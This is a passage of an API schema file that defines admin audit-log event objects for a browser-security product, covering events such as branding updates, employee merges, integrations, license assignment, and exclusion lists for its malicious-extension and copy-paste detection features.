domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_673"},"schema_674":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["EXTENDED_AUDIT_LOGGING_TOGGLED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Extended audit logging toggled"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com set extended audit logging to true"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the extended audit logging setting was set to enabled or not."}}}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_674"},"schema_675":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example removed excluded extension domains"},"object":{"type":"string","enum":["EXCLUDED_EXTENSION_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Excluded extension domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_675"},"schema_676":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Browser extension banner branding logo uploaded"},"object":{"type":"string","enum":["EXTENSION_BRANDING_LOGO_UPLOADED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Extension branding logo uploaded"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"logoUrl":{"type":"string","description":"URL where the new logo is stored.","example":"https://example.com/logo.png"}},"required":["logoUrl"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_676"},"schema_677":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Browser extension banner branding updated"},"object":{"type":"string","enum":["EXTENSION_BRANDING_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Extension branding updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"logoUrl":{"type":"string","nullable":true,"description":"URL where the new logo is stored.","example":"https://example.com/logo.png"},"borderColor":{"type":"string","description":"Color of the banner border (in HEX).","example":"#ABC123"},"buttonColor":{"type":"string","description":"Color of the banner button (in HEX).","example":"#ABC123"},"linkColor":{"type":"string","description":"Color of the banner links (in HEX).","example":"#ABC123"},"alignment":{"type":"string","enum":["LEFT","CENTRE"],"description":"Banner text alignment.","example":"LEFT"},"theme":{"type":"string","enum":["LIGHT","DARK"],"description":"Banner theme.","example":"LIGHT"},"helpLinkHidden":{"type":"boolean","description":"Whether the help link is hidden on banners and block screens. When false, the link is shown using helpLinkText/helpLinkUrl, or the Push defaults if those are null.","example":false},"helpLinkText":{"type":"string","nullable":true,"description":"Display text for the help link. Null when the team uses the default text (shown when helpLinkHidden is false) or when the link is hidden.","example":"Why am I seeing this?"},"helpLinkUrl":{"type":"string","nullable":true,"description":"Destination URL for the help link. Null when the team uses the default Push-hosted URL (shown when helpLinkHidden is false) or when the link is hidden.","example":"https://example.com/help"}},"required":["borderColor","buttonColor","linkColor","alignment","theme"]}},"required":["version","id","tenantId","timestamp","category","object","actor"]},"id":"schema_677"},"schema_678":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated an employee's primary email"},"object":{"type":"string","enum":["EMPLOYEE_EMAIL_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employee email updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"email":{"type":"string","format":"email","description":"The new email address of the employee."}},"required":["email"]},"old":{"type":"object","properties":{"email":{"type":"string","format":"email","description":"The old email address of the employee."}},"required":["email"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new","old"]},"id":"schema_678"},"schema_679":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated an employee's name"},"object":{"type":"string","enum":["EMPLOYEE_NAME_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employee name updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"email":{"type":"string","description":"The email address of the employee."},"firstName":{"type":"string","description":"The updated first name."},"lastName":{"type":"string","description":"The updated last name."}},"required":["email","firstName","lastName"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_679"},"schema_680":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed an employee from the group Engineers"},"object":{"type":"string","enum":["EMPLOYEE_REMOVED_FROM_GROUP"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employee removed from group"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"group":{"type":"string","description":"The name of the group."},"employee_id":{"type":"string","description":"The ID of the employee removed from the group."}},"required":["group","employee_id"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_680"},"schema_681":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com merged employees"},"object":{"type":"string","enum":["EMPLOYEES_MERGED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employees merged"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"primaryEmployeeId":{"type":"string","description":"The ID of the primary employee."},"secondaryEmployeeIds":{"type":"array","items":{"type":"string"},"description":"A list of the IDs of the employees that were merged into the primary employee."}},"required":["primaryEmployeeId","secondaryEmployeeIds"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_681"},"schema_682":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com unmerged employees"},"object":{"type":"string","enum":["EMPLOYEES_UNMERGED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employees unmerged"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"primaryEmployeeId":{"type":"string","description":"The ID of the primary employee."},"unmergedEmployeeId":{"type":"string","description":"The ID of the new employee unmerged."},"unmergedEmail":{"type":"string","description":"The email used to unmerge the employee."}},"required":["primaryEmployeeId","unmergedEmployeeId","unmergedEmail"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_682"},"schema_683":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example generated an integration link for Google"},"object":{"type":"string","enum":["INTEGRATION_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Integration added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"appType":{"type":"string","description":"Type of integration that has been added."}},"required":["appType"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_683"},"schema_684":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Google integration completed"},"object":{"type":"string","enum":["INTEGRATION_COMPLETED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Integration added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActorNullEmail"},"new":{"type":"object","properties":{"appType":{"type":"string","description":"Type of integration that has been completed."}},"required":["appType"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_684"},"schema_685":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example removed a Google integration"},"object":{"type":"string","enum":["INTEGRATION_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Integration removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"appType":{"type":"string","description":"Type of integration that has been removed."}},"required":["appType"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_685"},"schema_686":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated a label"},"object":{"type":"string","enum":["LABEL_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Label updated"},"actor":{"type":"object","$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"label":{"type":"string","description":"The new value of the updated label."}},"required":["label"]},"old":{"type":"object","properties":{"label":{"type":"string","description":"The value of the label before the update."}},"required":["label"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new","old"]},"id":"schema_686"},"schema_687":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed a label"},"object":{"type":"string","enum":["LABEL_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Label removed"},"actor":{"type":"object","$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"label":{"type":"string","description":"The removed label."}},"required":["label"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_687"},"schema_688":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com toggled leaked password check to true"},"object":{"type":"string","enum":["LEAKED_PASSWORD_CHECK_TOGGLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Leaked password check toggled"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the leaked password check is enabled or not.","example":true}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_688"},"schema_689":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example assigned licenses to employees"},"object":{"type":"string","enum":["LICENSE_ASSIGNED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"License assigned"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"employees":{"type":"array","items":{"type":"string"},"description":"A list of the employees that have been assigned a license."}},"required":["employees"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_689"},"schema_690":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example removed licenses from employees"},"object":{"type":"string","enum":["LICENSE_ASSIGNED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"License removed"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"employees":{"type":"array","items":{"type":"string"},"description":"A list of the employees from which the license has been removed."}},"required":["employees"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_690"},"schema_691":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added excluded extensions"},"object":{"type":"string","enum":["MALICIOUS_BROWSER_EXTENSION_DETECTION_EXCLUDED_EXTENSIONS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malicious browser extension detection excluded extensions added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the excluded extensions."},"new":{"type":"object","properties":{"excludedExtensions":{"type":"array","items":{"type":"object","properties":{"extensionId":{"type":"string","description":"The identifier of the excluded browser extension.","example":"dljjddkmmcminffjbcmeccgfbjlhmhlm"},"notes":{"type":"string","description":"Optional notes about the exclusion.","nullable":true}},"required":["extensionId"]},"description":"A list of the added excluded extensions."}},"required":["excludedExtensions"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_691"},"schema_692":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed excluded extensions"},"object":{"type":"string","enum":["MALICIOUS_BROWSER_EXTENSION_DETECTION_EXCLUDED_EXTENSIONS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malicious browser extension detection excluded extensions removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the excluded extensions."},"new":{"type":"object","properties":{"excludedExtensions":{"type":"array","items":{"type":"object","properties":{"extensionId":{"type":"string","description":"The identifier of the excluded browser extension.","example":"dljjddkmmcminffjbcmeccgfbjlhmhlm"},"notes":{"type":"string","description":"Optional notes about the exclusion.","nullable":true}},"required":["extensionId"]},"description":"A list of the removed excluded extensions."}},"required":["excludedExtensions"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_692"},"schema_693":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added ignored domains"},"object":{"type":"string","enum":["MALICIOUS_COPY_PASTE_DETECTION_IGNORED_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malicious copy paste detection ignored domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_693"},"schema_694":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed ignored domains"},"object":{"type":"string","enum":["MALICIOUS_COPY_PASTE_DETECTION_IGNORED_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malicious copy paste detection ignored domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_694"},"schema_695":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com has updated the apps where MFA status is not tracked."},"object":{"type":"string","enum":["MFA_TRACKING_EXCLUSIONS_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"MFA tracking exclusions updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that set the MFA tracking exclusions."},"new":{"type":"object","properties":{"exceptions":{"type":"array","items":{"type":"string"},"description":"A list of the apps that will track MFA status."}},"required":["exceptions"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_695"},"schema_696":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example toggled monitor all domains to true"},"object":{"type":"string","enum":["MONITOR_ALL_DOMAINS_TOGGLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Monitor all domains toggled"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that toggled the 